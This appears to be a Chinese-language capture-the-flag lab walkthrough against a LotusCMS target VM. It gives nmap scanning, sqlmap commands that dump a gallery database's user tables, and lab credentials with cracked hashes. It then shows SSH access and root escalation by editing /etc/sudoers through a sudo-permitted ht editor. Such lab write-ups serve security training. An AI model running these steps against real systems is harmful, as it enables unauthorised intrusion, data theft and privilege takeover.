信息收集
使用nmap主机发现靶机ip
kali ip 192.168.134.130
扫IP
使用nmap端口扫描发现靶机开放端口
nmap -A 192.168.134.156 -p 1-65535
打开网站,点击login,跳转到登录页面,发现该网站cms为:LotusCMS
访问 http://192.168.134.156/gallery
SQL注入
1、发现 url 中含 id 参数,sqlmap 测试SQL注入,存在
sqlmap -u "http://192.168.134.156/gallery/gallery.php?id=1" --batch
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch --dbs # 查询数据库名
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery --tables # 查询gallery库下数据表
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T gallarific_users --dump 查询 user 表下用户
sqlmap -u "http://192.168.59.129/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --dump
# admin:n0t7t1k4
# dreg:0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)
# loneferret:5badcaf789d3d1d09794d8f021f40f0e (starwars)getshell
尝试另两组用户名密码,发现可通过 ssh 远程连接
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
提权
发现 loneferret 用户存在利用点
cat /etc/passwd
查看用户家目录
ls
cat CompanyPolicy.README
根据提示,执行命令
ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
sudo /bin/bash
提权成功
